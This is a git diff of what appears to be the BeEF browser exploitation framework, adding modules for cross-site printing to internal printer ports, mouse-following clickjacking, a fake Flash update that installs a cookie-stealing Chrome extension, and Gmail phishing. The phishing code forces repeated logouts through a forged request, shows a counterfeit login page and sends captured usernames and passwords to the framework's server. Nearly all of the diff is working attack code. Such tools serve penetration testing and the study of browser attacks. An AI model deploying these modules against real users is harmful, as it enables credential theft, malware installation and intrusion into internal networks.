myExt.setAttribute("id","msg_<%= @command_id %>"); + myExt.setAttribute("name","msg_<%= @command_id %>"); + myExt.setAttribute("wrap","none"); + myExt.setAttribute("rows","70"); + myExt.setAttribute("cols","100"); + myform.appendChild(myExt); + + // send message + iframe.contentWindow.document.getElementById("msg_<%= @command_id %>").value = "<%= @msg.gsub(/"/, '\\"').gsub(/\r?\n/, '\\n') %>"; + myform.submit(); + + // clean up + setTimeout('document.body.removeChild(document.getElementById("ipc_cross_site_printing_<%= @command_id %>"));', 15000); + } + + // validate target + if (!target_port || !target_ip || isNaN(target_port)) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed target host or target port'); + } else if (target_port > 65535 || target_port < 0) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port'); + // send request and wait for reply + } else { + send_msg(target_ip, target_port); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Message sent'); + } + +}); + diff --git a/modules/ipec/cross_site_printing/config.yaml b/modules/ipec/cross_site_printing/config.yaml new file mode 100644 index 000000000..370b690bd --- /dev/null +++ b/modules/ipec/cross_site_printing/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + cross_site_printing: + enable: true + category: "IPEC" + name: "Cross-Site Printing (XSP)" + description: "Using Inter-protocol Exploitation/Communication (IPEC) the hooked browser will send a message to a listening print port (9100 by default) on the target specified in the 'Target Address' input field.

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet." + authors: ["bcoles"] + target: + working: ["FF"] diff --git a/modules/ipec/cross_site_printing/module.rb b/modules/ipec/cross_site_printing/module.rb new file mode 100644 index 000000000..e74227dee --- /dev/null +++ b/modules/ipec/cross_site_printing/module.rb @@ -0,0 +1,77 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Cross_site_printing < BeEF::Core::Command + + def self.options + return [ + {'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'}, + {'name'=>'port', 'ui_label' => 'Target Port', 'value' => '9100'}, + {'name'=>'msg', 'ui_label' => 'Message', 'description' => 'Message to print', 'type'=>'textarea', 'value'=>"********************************************************************** + + .O, + lkOl + od cOc + 'X, cOo. + cX, ,dkc. + BeEF ;Kd. ,odo,. + .dXl . .:xkl' + 'OKc .;c' ,oOk: + ,kKo. .cOkc. .lOk:. + .dXx. :KWKo. 'dXd. + .oXx. cXWW0c..dXd. + oW0 .OWWWNd.'KK. + ....,;lkNWx KWWWWX:'XK. + ,o:, .,:odkO00XNK0Okxdlc,. .KWWWWWWddWd + K::Ol .:d0NXK0OkxdoxO' .lXWWWWWWWWKW0 + od d0. .l0NKOxdooooooox0. .,cdOXWWWWWWWWWWWWWx + :O ;K; ;kN0kooooooooooooK: .':ok0NWWWWWWWWWWWWWWWWWWK. + 'X .Kl ;KNOdooooooooooooooXkkXWWWWWWWWWWWWWWWWWWWWWWWNd. + .N. o. .Kl 'OW0doooooooooooooodkXWWWWWWWWWWWWWWWWWWWWWWWW0l. + 0l oK' .kO:';kNNkoooooooooooook0XWWWWWWWWWWWWWWWWWWWWWWWKx:. + lX.,WN: .:c:xWkoooooooooood0NWW0OWWWWWWWWWWWWWWWWWWWKo. + 0O.0WWk' .XKoooooooooooONWWNo dWWWWWWWWWWWWWWWWWl + oKkNWWWX00NWXdooooooooxXWWNk' dWWWWWWWWWWWWWWWWX + .cONWWWWWWWWOoooooooONWWK:...c0WWWWWWWWWWWWWWWWWW: + .;oONWWWWxooooodKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWX. + 'XW0oooookNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWd + oW0ooooo0WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWO + ;NXdooodKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWx + ;xkOOdooooxOO0KNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWX. + .NOoddxkkkkxxdoookKWWWWWWWWWWWWWWWWWWWWWWWWWWX' + :KNWWWWWWWWWWX0xooONWWWWWWWWWWWWWWWWWWWWWWWk. + .xNXxKWWWWWWWOXWWXxoKWWWWWWWWWWWWWWWWWWWWNk' + OWl cNWWWWWWWk oNWNxKWWWWWWWWWWWWWWWWWNOl. + ,Wk xWWWWWWWWd xWWNWWWWWWWWWWWWXOdc,. + .N0 lOXNX0x; .KWWWWWWWWWWWNkc. + :NO, 'lXWWWWWWWWWNk:. + .dXN0OkxkO0NWWWWWWWWWWKl. + .';o0WWWWWWWWWWWNk; + .cxOKXKKOd;. + +**********************************************************************", 'width'=>'200px' }, + ] + end + + def post_execute + content = {} + content['result'] = @datastore['result'] if not @datastore['result'].nil? + content['fail'] = @datastore['fail'] if not @datastore['fail'].nil? + if content.empty? + content['fail'] = 'No data was returned.' + end + save content + end +end diff --git a/modules/misc/iframe_sniffer/config.yaml b/modules/misc/iframe_sniffer/config.yaml index 0fc20b8fa..61c796fa1 100644 --- a/modules/misc/iframe_sniffer/config.yaml +++ b/modules/misc/iframe_sniffer/config.yaml @@ -19,7 +19,8 @@ beef: enable: true category: "Misc" name: "iFrame Sniffer" - description: "This module attempts to do framesniffing (aka Leaky Frame). It will append leakyframe.js (written by Paul Stone) to the DOM and check for specified anchors to be present on a url.
For more information, refer to http://www.contextis.co.uk/research/blog/framesniffing/" + description: "This module attempts to do framesniffing (aka Leaky Frame). It will append leakyframe.js (written by Paul Stone) to the DOM and check for specified anchors to be present on a URL.
For more information, refer to http://www.contextis.co.uk/research/blog/framesniffing/" authors: ["Bart Leppens"] target: - working: "S" + working: ["S", "IE"] + not_working: ["ALL"] diff --git a/modules/social_engineering/clickjacking/command.js b/modules/social_engineering/clickjacking/command.js new file mode 100644 index 000000000..70985c019 --- /dev/null +++ b/modules/social_engineering/clickjacking/command.js @@ -0,0 +1,92 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + + var offset_top = "<%= @offset_top %>"; + var offset_left = "<%= @offset_left %>"; + var url = "<%= @url %>"; + var debug = <%= @debug %>; + + if (debug) opacity = 10; else opacity = 0; + + // create container + var cjcontainer = document.createElement('div'); + cjcontainer.id = "cjcontainer"; + cjcontainer.setAttribute("style", "-moz-opacity:"+opacity); + cjcontainer.style.zIndex = 999; + cjcontainer.style.border = "none"; + cjcontainer.style.width = "30px"; + cjcontainer.style.height = "20px"; + cjcontainer.style.overflow = "hidden"; + cjcontainer.style.position = "absolute"; + cjcontainer.style.opacity = opacity; + cjcontainer.style.filter = "alpha(opacity="+opacity+")"; + cjcontainer.style.cursor = "default"; + document.body.appendChild(cjcontainer); + + // create iframe + var cjiframe = document.createElement('iframe'); + cjiframe.id = "cjiframe"; + cjiframe.src = url; + cjiframe.scrolling = "no"; + cjiframe.frameBorder = "0"; + cjiframe.allowTransparency = "true"; + cjiframe.style.overflow = "hidden"; + cjiframe.style.position = "absolute"; + cjiframe.style.top = offset_top+"px"; + cjiframe.style.left = offset_left+"px"; + cjiframe.style.width = "200px"; + cjiframe.style.height = "100px"; + cjiframe.style.border = "none"; + cjiframe.style.cursor = "default"; + cjcontainer.appendChild(cjiframe); + + // followmouse code by rsnake + // http://ha.ckers.org/weird/followmouse.html + // modified by bcoles + function followmouse(e){ + + var xcoord = 0; + var ycoord = 0; + var gettrailobj = function() { + if (document.getElementById) + return document.getElementById("cjcontainer").style; + else if (document.all) + return document.all.container.style; + } + if (typeof e != "undefined") { + xcoord += e.pageX - 10; + ycoord += e.pageY - 15; + } else if (typeof window.event != "undefined") { + xcoord += document.body.scrollLeft + event.clientX; + ycoord += document.body.scrollTop + event.clientY; + } + var docwidth = document.all ? document.body.scrollLeft + document.body.clientWidth : pageXOffset+window.innerWidth - 15; + var docheight = document.all ? Math.max(document.body.scrollHeight, document.body.clientHeight) : Math.max(document.body.offsetHeight, window.innerHeight) + gettrailobj().left = xcoord + "px"; + gettrailobj().top = ycoord + "px"; + } + + // hook to mousemove event + if (window.addEventListener) { + window.addEventListener('mousemove', followmouse, false); + } else if (window.attachEvent) { + window.attachEvent('mousemove', followmouse); + } + + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'clickjack=hooked mousemove event'); + +}); diff --git a/modules/social_engineering/clickjacking/config.yaml b/modules/social_engineering/clickjacking/config.yaml new file mode 100644 index 000000000..0d9d51248 --- /dev/null +++ b/modules/social_engineering/clickjacking/config.yaml @@ -0,0 +1,27 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + clickjacking: + enable: true + category: "Social Engineering" + name: "Clickjacking" + description: "This module serves as a template for clickjacking attacks.
Simply specify the target URL and the offset (in pixels) for the iframe content. The iframe will follow the mouse cursor.
Debug mode creates a visible iframe for testing purposes." + authors: ["bcoles"] + target: + user_notify: ["FF", "C"] + not_working: ["IE"] + diff --git a/modules/social_engineering/clickjacking/module.rb b/modules/social_engineering/clickjacking/module.rb new file mode 100644 index 000000000..c005d87c5 --- /dev/null +++ b/modules/social_engineering/clickjacking/module.rb @@ -0,0 +1,35 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Clickjacking < BeEF::Core::Command + + def self.options + configuration = BeEF::Core::Configuration.instance + uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/clickjack.html" + return [ + { 'name' => 'url', 'description' => 'Target URL', 'ui_label' => 'Target URL', 'value' => uri, 'width'=>'400px' }, + { 'name' => 'offset_top', 'description' => 'Offset Top (in pixels)', 'ui_label' => 'Offset Top (px)', 'value' => '-40', 'width'=>'150px' }, + { 'name' => 'offset_left', 'description' => 'Offset Left (in pixels)', 'ui_label' => 'Offset Left (px)', 'value' => '-10', 'width'=>'150px' }, + { 'name' => 'debug', 'type' => 'combobox', 'ui_label' => 'Debug Mode', 'store_type' => 'arraystore', 'store_fields' => ['debug'], 'store_data' => [['true'],['false']], 'valueField' => 'debug', 'value' => 'false', editable: false, 'displayField' => 'debug', 'mode' => 'local', 'autoWidth' => true } + ] + end + + def post_execute + content = {} + content['clickjack'] = @datastore['clickjack'] + save content + end + +end diff --git a/modules/social_engineering/fake_flash_update/command.js b/modules/social_engineering/fake_flash_update/command.js new file mode 100644 index 000000000..c86e73fce --- /dev/null +++ b/modules/social_engineering/fake_flash_update/command.js @@ -0,0 +1,33 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + + // Grab image and payload from config + image = "<%== @image %>"; + payload = "<%== @payload %>"; + + // Add div to page + div = document.createElement('div'); + div.setAttribute('id', 'splash'); + div.setAttribute('style', 'position:absolute; top:30%; left:40%;'); + div.setAttribute('align', 'center'); + document.body.appendChild(div); + div.innerHTML= ''; + $j("#splash").click(function () { + $j(this).hide(); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=user has accepted'); + }); +}); diff --git a/modules/social_engineering/fake_flash_update/config.yaml b/modules/social_engineering/fake_flash_update/config.yaml new file mode 100644 index 000000000..78131d2c4 --- /dev/null +++ b/modules/social_engineering/fake_flash_update/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + fake_flash_update: + enable: true + category: "Social Engineering" + name: "Fake Flash Update" + description: "Prompts the user to install an update to Adobe Flash Player.
The default install file is a Chrome extension.

A chrome extenstion has privileged access and can do a whole lot..
  • - Access all tabs and inject beef into all tabs
  • - Use hooked browser as a proxy to do cross domain requests
  • - Get all cookies including HTTPonly cookies

See chrome extensions beef modules for more examples
See extensions/demos/flash_update_chrome_extension for extension source" + authors: ["mh"] + target: + user_notify: ['ALL'] diff --git a/modules/social_engineering/fake_flash_update/module.rb b/modules/social_engineering/fake_flash_update/module.rb new file mode 100644 index 000000000..58e05d06d --- /dev/null +++ b/modules/social_engineering/fake_flash_update/module.rb @@ -0,0 +1,38 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Fake_flash_update < BeEF::Core::Command + + def self.options + configuration = BeEF::Core::Configuration.instance + payload = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/adobe_flash_update.crx" + image = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/adobe_flash_update.png" + + return [ + {'name' =>'payload', 'description' =>'Location of the chrome extension that user is promted to install', 'ui_label'=>'Chrome extension', 'value' => payload}, + {'name' =>'image', 'description' =>'Location of image for the update prompt', 'ui_label'=>'Splash image', 'value' => image} + + ] + end + + # + # This method is being called when a zombie sends some + # data back to the framework. + # + def post_execute + save({'answer' => @datastore['answer']}) + end + +end diff --git a/modules/social_engineering/gmail_phishing/command.js b/modules/social_engineering/gmail_phishing/command.js new file mode 100644 index 000000000..0926bd59d --- /dev/null +++ b/modules/social_engineering/gmail_phishing/command.js @@ -0,0 +1,51 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +function logoutGoogle() { + var img = document.createElement("IMG"); + img.src = "https://mail.google.com/mail/?logout"; + img.height = "1px"; + img.width = "1px"; + img.style.visibility = "hidden"; + document.body.appendChild(img); + //set a new setTimeout to redo the logout + setTimeout('logoutGoogle()', <%= @logout_gmail_interval %>); +} + +beef.execute(function() { + document.title = "Google Mail: Email from Google"; + beef.browser.changeFavicon("https://mail.google.com/favicon.ico"); + logoutGoogle(); + displayPhishingSite(); +}); + +function clickedSubmitButton(){ + var credentials = "Username: "+document.getElementById('Email').value+" Password: "+document.getElementById('Passwd').value; + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+credentials); + //Timeout needed because otherwise the beef panel doesn't get the credentials in time + setTimeout("redirect()", <%= @wait_seconds_before_redirect %>); +} +function redirect(){ + var theXssUrl = "<%== @xss_hook_url %>"; + if(theXssUrl){ + window.open(theXssUrl); + window.focus(); + } + window.location = "https://accounts.google.com/ServiceLoginAuth"; +} + +function displayPhishingSite(){ + document.body.innerHTML = " Google Mail: Email from Google

Google Mail

A Google approach to email.

Google Mail is built on the idea that email can be more intuitive, efficient, and useful. And maybe even fun. After all, Google Mail has:

  • Lots of space

    Over 2757.272164 megabytes (and counting) of free storage.

  • Less spam

    Keep unwanted messages out of your inbox.

  • Mobile access

    Get Google Mail on your mobile phone. Learn more

Take Google Mail to work with Google Apps for Business

Love Google Mail, but looking for a custom email address for your company?
Get business email, calendar, and online docs @your_company.com. Learn more

"; +} diff --git a/modules/social_engineering/gmail_phishing/config.yaml b/modules/social_engineering/gmail_phishing/config.yaml new file mode 100644 index 000000000..2ec1d6c6e --- /dev/null +++ b/modules/social_engineering/gmail_phishing/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + gmail_phishing: + enable: true + category: ["Social Engineering"] + name: "Google Phishing" + description: "This plugin uses an image tag to XSRF the logout button of Gmail. Continuously the user is logged out of Gmail (eg. if he is logged in in another tab). Additionally it will show the Google favicon and a Gmail phishing page (although the URL is NOT the Gmail URL)." + authors: ["floyd @floyd_ch floyd.ch"] + target: + user_notify: ['ALL'] diff --git a/modules/social_engineering/gmail_phishing/module.rb b/modules/social_engineering/gmail_phishing/module.rb new file mode 100644 index 000000000..dc12c3a33 --- /dev/null +++ b/modules/social_engineering/gmail_phishing/module.rb @@ -0,0 +1,50 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Gmail_phishing < BeEF::Core::Command + + def self.options + configuration = BeEF::Core::Configuration.instance + + xss_hook_url = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html" + logout_gmail_interval = 10000 + wait_seconds_before_redirect = 1000 + return [ + {'name' => 'xss_hook_url', + 'description' => 'The URI including the XSS to hook a browser. If the XSS is not exploitable via an URI, simply leave this field empty, but this means you will loose the hooked browser after executing this module.', + 'ui_label' => 'XSS hook URI', + 'value' => xss_hook_url, + 'width' => '300px' }, { + 'name' => 'logout_gmail_interval', + 'description' => 'The victim is continuously loged out of Gmail. This is the interval in ms.', + 'ui_label' => 'Gmail logout interval (ms)', + 'value' => logout_gmail_interval, + 'width' => '100px' }, { + 'name' => 'wait_seconds_before_redirect', + 'description' => 'When the user submits his credentials on the phishing page, we have to wait (in ms) before we redirect to the real Gmail page, so that BeEF gets the credentials in time.', + 'ui_label' => 'Redirect delay (ms)', + 'value' => wait_seconds_before_redirect, + 'width' => '100px' } + ] + end + + def post_execute + content = {} + content['Result'] = @datastore['result'] + save content + + end + +end